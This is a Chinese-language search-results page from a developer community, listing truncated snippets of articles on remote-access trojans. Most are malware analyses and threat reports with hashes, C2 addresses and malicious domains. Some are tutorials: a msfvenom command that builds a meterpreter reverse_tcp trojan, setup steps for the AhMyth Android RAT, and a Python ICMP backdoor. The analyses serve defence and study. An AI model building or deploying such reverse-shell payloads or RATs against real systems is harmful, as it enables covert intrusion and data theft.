- 综合排序
- 最热优先
- 最新优先
- 来自专栏极安御信安全研究院
远控木马病毒分析
SHA256:880a402919ba4e896f6b4b2595ecb7c06c987b025af73494342584aaa84544a1
1.1K21编辑于 2023-08-24 - 来自专栏高性能服务器开发
大灰狼远控木马源码分析
本次小方给大家分析一下大灰狼远程控制木马的源码。 大灰狼远程控制木马是一个较为常见的远控工具,不同的木马病毒团伙对其定制改造后发布了诸多变种。 本章将从启动过程、通信协议、远控功能三个方面逆向分析该木马的实现原理。 +3Ch+var_F], 75h .text:004061F7 mov [esp+3Ch+var_D], 50h .text:004061FC mov [esp+3Ch+var_C], 72h . 16.5 远控功能分析 远控功能分析如代码清单 16-5 所示。 有了对大灰狼远控木马的分析,读者可以根据病毒的实现原理,编写对应的修复、防御工具,制作针对大灰狼远控木马的专杀软件。 本文摘编自《C++反汇编与逆向分析技术揭秘(第2版)》,经出版方授权发布。
7.5K40编辑于 2021-12-08 - 来自专栏信息安全必修课
使用kali msfvenom编写远控木马“实验”
windows/meterpreter/reverse_tcp LHOST=192.168.0.1LPORT=4444-f exe -o windows.exe 得到生成的名为windows.exe的木马程序 把生成的windows.exe木马文件拖放到windows靶机上,运行。 图片 本篇文章就到此结束了,注,本文章只能用于学习,生成的木马文件不得传播,传播后造成损失的将会按照法律依法处理。
2.7K51编辑于 2023-04-23 - 来自专栏FreeBuf
瞄准金融行业的远控木马:SpyNote
间谍软件是最常见的恶意软件之一,攻击者通过 Android 间谍软件来跟踪用户位置、检查 Web 浏览记录,甚至窃取敏感信息(密码和信用卡号等),其对银行机构与客户构成的威胁与 Android 银行木马相媲美 卓越的能力 SpyNote.C 恶意软件变种执行的独特功能,在 2022 年具有远控功能更的恶意软件中被识别出来。 social_creds.this.findViewById(0x7F05002C)).getText().toString(); // id:passgmalif(usrgmail.length() <= 3) IOC 6f606bc5004af2b90b66d6e6e4f29f35a3b4a31dc6974b55434b3c53d70584a4 114fa822d7a96169c9cd48303f7fbd1af94f57cb46fec576d91ccea11bc5d974 34d70ce1e9eeafdc225abbfa84c24454986a47ca7a41431c38ca16e612d3f818 bd172dbb47a95e7abc3ce76118bf6cd3f742d7c932ec8801cd553509f31eca8e
2.5K30编辑于 2023-02-10 - 来自专栏安恒网络空间安全讲武堂
一种 Au3 远控木马变种样本分析
一种 Au3 远控木马变种样本分析 0x01 Au3 简介 AutoIt3 (简称 Au3)是一种能够在Windows GUI 或 DOS 上实现一系列自动化任务的脚本语言,其语法类似BASIC。 可以认为,该新型木马变种的作者在原有的利用代码框架上,进行了增配和强化,使其完全具备远控木马的功能。 3.4 远控行为 得到 inject.dll 后,发现该模块为 C# 源码编写,用 dnSpy 载入分析发现,木马运行时,首先建立与远控服务器的心跳包连接,将受害者主机的基本信息回传到木马服务器。 此外,该远控木马客户端上线时,回传本机基础信息使用的是 BASE64 编码来加密流量.: ? 0x04 免杀思路总结 在自解压注释中,通过增加正常的小说文本来干扰杀软的识别。 根据第三方情报数据显示,该远控端 IP 早在 2016 年就被捕获过可疑行为: ? ?
2.9K70发布于 2018-02-06 - 来自专栏kevin-blog
介绍一个安卓远控木马
今天就体验一下这款安卓远控木马 工具: java的运行环境 AhMyth Android RAT应用程序 我的系统:ubuntu18.04 安装: 方式一: 源代码编译: git clone https 危害 这个木马可以在免root的情况下不知不觉的远程打开受感染目标手机的摄像头,查看短信,录制麦克风,定位地址等一系列操作。 防御方式: 不管什么木马,都需要你点击运行,才会起效,所以不要下载第三方应用,切记切记。特别是各位女孩子!! 最后: 本博客只是出于教育目的,对于因使用此工具而造成的任何直接或间接损失,我概不负责。
16.5K10发布于 2018-09-18 - 来自专栏FreeBuf
“大黄蜂”远控挖矿木马分析与溯源
事件背景: 近日,腾讯安全反病毒实验室发现了一类远控木马具有爆发的趋势。 通过跟踪发现,此类木马不仅保留了远控的功能,而且随着虚拟货币价格的水涨船高,木马加入了挖矿的功能,用用户的机器来实现自己利益的最大化。 技术分析: 通过分析发现,该木马启动后,会释放多个可执行文件,我们按其 实现的不同的 功能,将这些可 执行程序,划分为远控模块、挖矿模块和清理模块三个模块,分别用于远程控制、虚拟货币挖矿以及删除清理文件以躲避查杀 远控模块 1. 888.exe运行后会从 资源里释放dll 文件,并命名为随机名。 通过对发送数据以及加密方式的分析,我们可以看出发送的数据和加密方式和Gh0st远控非常相似,可以认定其为Gh0st远控的变种: ?
2.6K70发布于 2018-03-01 - 来自专栏FreeBuf
Nanocore等多个远控木马滥用公有云服务传播
从 2021 年 10 月 26 日开始,研究人员发现多个远控木马开始通过云服务进行投递传播。 感染链从带有恶意 ZIP 附件的钓鱼邮件开始,ZIP 文件中包含一个带有恶意程序的 ISO 镜像文件。 △ 感染链 攻击者使用的远控木马是 Netwire、Nanocore 和 AsyncRAT,并且利用免费动态 DNS 服务 DuckDNS 注册了多个恶意域名。 一些下载服务器运行的是 Apache 服务器: △ 开放目录 每个远控木马都根据配置文件连接对应的 C&C 服务器,IP 地址如下所示: 103.151.123.194 185.249.196.175
1.4K20编辑于 2022-02-24 - 来自专栏FreeBuf
远控盗号木马伪装成850Game作恶
前言 近期,360QVM团队捕获到一类在网上广泛传播的远控盗号木马,该木马伪装为正规棋牌游戏850Game的安装程序,在伪造的钓鱼网站(如:www.gam850.com)上挂马并诱骗用户下载。 伪造的850Game钓鱼网站 木马伪装 木马制作者将木马程序和游戏棋牌程序捆绑在一起进行传播,当用户开始安装后,程序除了在“C:\Program Files”下安装850棋牌游戏外,还会在C盘目录下创建一个隐藏文件夹 : 将植入远控木马的时间存到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FSkcia msmaowaw中的MarkTime ? 而从木马的主要行为来看,这些伪造棋牌游戏的木马都比较相似,猜测这批伪装成850棋牌游戏网站的站点背后的操作者很有可能是同一伙人。 传播方式 由分析可知,这一批木马程序都是通过伪装成棋牌游戏进程传播木马,现将这一批伪装成棋牌游戏的网站整理如下: ?
2K50发布于 2018-02-09 - 来自专栏FreeBuf
反间谍之旅:首款安卓远控木马工具分析
近日研究员在Google Play上发现了首款基于AhMyth(安卓远控木马工具)的间谍软件。这款恶意软件名为RB Music,是一款为Balouchi音乐爱好者提供流媒体广播的应用程序。 二、间谍软件远控框架 客户端通过解析控制端发送的指令order执行获取联系人信息、短信信息、文件信息以及发送短信等不同操作并将收集的信息发送至控制端:http://ra****ch.com。 ? 图3-7 远控主体程序 解析指令order,当getString(order)==x0000cn时,获取联系人信息。 ? 图3-17 发送短信链接 四、AhMyth框架介绍 AhMyth是一款安卓远控木马工具。它有两个组件:一个是服务器端,一个是客户端。 ? 图3-20 AhMyth工具监听端口 通过控制台可以实施Camera、Location、contacts、SMS、Calls Logs等各种远控操作。 ?
2.9K00发布于 2019-10-10 - 来自专栏公共互联网反网络钓鱼(APCN)
仿冒 CERT‑UA 钓鱼攻击中 AGEWHEEZE 远控木马机理与防御研究
下载加密压缩包并安装伪造安全工具,实则部署 AGEWHEEZE 多功能远控木马。 的加密压缩包,释放 AGEWHEEZE 远控木马,实现命令执行、文件窃取、屏幕监控、剪贴板窃取与持久化驻留。 邮件附带 Files.fm 链接与解压密码,压缩包内 install_protection.exe 实为 AGEWHEEZE 远控木马。 3 AGEWHEEZE 远控木马技术机理深度解析3.1 基础开发与结构特征AGEWHEEZE 由 Go 语言编写,采用静态编译,跨平台兼容 Windows 主流版本。 8 结论本文以 UAC‑0255 仿冒 CERT‑UA 投递 AGEWHEEZE 远控木马事件为实证,系统剖析攻击链路、木马机理、实现技术与防御体系,得出以下结论:仿冒国家级 CERT 是社会工程学攻击的高效手段
20510编辑于 2026-04-06 - 来自专栏FreeBuf
虚假 CVE-2023-40477 PoC 传播远控木马
在分析了该虚假 PoC 脚本后,研究人员发现该脚本最终会安装 VenomRAT 远控木马。 一旦漏洞被公开披露,攻击者就会迅速采取行动。 如下所示,任务管理器中有一个名为 Windows.Gaming.Preview 的进程,该进程与后面介绍的 VenomRAT 远控木马同名。 可执行文件 Windows.Gaming.Preview.exe 是 VenomRAT 远控木马的变种,与前文介绍的任务管理器中的进程同名。 这表明,攻击者在制作视频时可能就已经在系统上运行 VenomRAT 远控木马了。 虚假 PoC 脚本中使用了 GeoServer 的漏洞 PoC,最终安装 VenomRAT 远控木马。
1.5K30编辑于 2023-10-06 - 来自专栏七夜安全博客
Python3实现ICMP远控后门(上)
ICMP后门 前言 这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了。 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两种协议在木马通信上很流行,特点是比较隐蔽,不容易被封锁。 本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很了解,因此将ICMP后门的实现分成几篇进行讲解,循序渐进。 第三节 ping实现 在上面我们简单讲解了ICMP的报文格式,接下来我们使用Python3根据报文格式简单实现一下ping功能,主要用到了raw socket技术,即原始套接字,使用struct pack
1.7K30发布于 2018-06-26 - 来自专栏公共互联网反网络钓鱼(APCN)
“伪装微软通知”新型钓鱼攻击横行,黑客用“加密马甲”投放远控木马
攻击者通过伪造微软官方账户安全警告邮件,诱导用户下载所谓“安全补丁”或“授权复核文档”,实则在后台悄然部署远控木马(RAT)与信息窃取程序。 动态解密:真正的远控木马(如Remcos、AsyncRAT、AgentTesla等)并不会一开始就出现在内存中,而是在运行一段时间后,由加载器动态解密并注入到合法进程中,实现“无文件攻击”或“内存驻留” 远控木马上线,你的电脑成了“透明玻璃屋”一旦解包完成,真正的恶意载荷就会被释放。 3. 将“加壳器家族”纳入威胁情报,打破“只看最终载荷”的思维定式当前许多安全团队仍以最终木马(如Remcos)为唯一关注点,忽视了前期的加载器和打包工具。 他举例说,如果某企业发现内部多台设备都出现了使用UpCrypter打包的未知程序,即便尚未触发木马行为,也应视为高风险事件,立即开展排查。
41710编辑于 2025-10-30 - 来自专栏FreeBuf
新型在野远控木马Woody RAT,针对俄罗斯航空航天组织
Malwarebytes 威胁情报团队发现了一种新的远控木马,命名为 Woody RAT,研究人员发现其在野已经存在至少一年。 IOC 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d ffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb kurmakata.duckdns[.]org microsoft-ru-data
1.9K30编辑于 2023-03-30 - 来自专栏FreeBuf
远控木马Posion Ivy开始肆虐缅甸和其它亚洲国家
臭名昭著的远程控制木马Poison Ivy(后面称作PIVY)最近开始重新露出水面。并且出现了一些新行为。过去一年,已经发现PIVY为了种种企图攻击了许多亚洲国家。 ActiveUpdate.dll和Active.dat文件在形如ActiveUpdate_ [0-9]{3}的文件夹中创建。 对于每个Command & Control (C2)服务器,这个字符串会有轻微的变化,以“1”开始的地方会在第二个C2时变成“2”,第三个会变为“3”,以此类推。 这个样本的时间与早些时候的样本有点不同,好像是一个后续活动,因为恶意文件的编译时间戳是2016年3月25日,再加上活动ID里的时间戳是2016年4月5日,以及首次发现在外散播的时间是2016年4月11日 这个样本的编译时间是2016年3月10日,被ASERT在2016年3月20日首此发现,并且包含了一个有效的Google数字签名。
1.5K100发布于 2018-02-08 - 来自专栏音视频咖
5G远控创新与探索,超低时延的远控传输
本期我们邀请了腾讯云音视频专家工程师——白松灵,为大家分享5G远控技术创新探索以及腾讯云在超低延时传输上的技术实践。 5G是当前的新趋势。 在矿山、冶金、港口以及开放道路等场景中,通过5G远控技术可以将实际操作的安全员从车上解放出来,实现真正的无人,甚至可以实现一名驾驶员控制多台车辆,解放更多人力成本。 未来我们将持续拓展更多的5G远程实时控制场景,让远控技术可以造福更多的行业。同时,我们也会持续致力于不断提升远控相关的性能与指标并探索更多的方式来增强远控的操控体验。
2.9K30编辑于 2023-01-18 - 来自专栏FreeBuf
神话传奇:一款通过卖号在微信群传播的远控木马
近期,360安全卫士监测到了一批通过微信群传播的远控木马,木马针对在网上倒卖微信号的人群定向投放。 卖号人的交流群里时常有不同的小号在散播诱导性的木马程序,不知情的卖号人运行木马后,电脑上就被植入后门。 认识卖号人 在分析远控木马之前,我们先来认识一下这批远控木马的目标人群——卖号人。 我们尝试联系某个卖号的代理人,经过沟通后发现有人专门负责在微信群里散播诱导性的远控木马程序。 ? (二)、远控木马 KGGouWo.exe的图标伪装成私服的样式,实际上是个远控木马,当运行在非安装目录时,会显示传奇游戏的图片,来欺骗用户。 ? 心跳包每隔10秒钟就会发送一次,用于向控制服务器证明远控木马一直处于上线状态。 ?
1.7K40发布于 2018-07-30 LySocket 远程ShellCode种植远控
127.0.0.1 1806 Open 2 127.0.0.1 1807 Open 3 1 124 x64 Registry 2 568 x64 smss.exe 3
1.3K20编辑于 2022-12-28- 来自专栏七夜安全博客
Python3实现ICMP远控后门(上)_补充篇
ICMP后门(上)补充篇 前言 在上一篇文章Python3实现ICMP远控后门(上)中,我简要讲解了ICMP协议,以及实现了一个简单的ping功能,在文章发表之后,后台很多朋友留言,说对校验和的计算不是很了解
95330发布于 2018-06-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号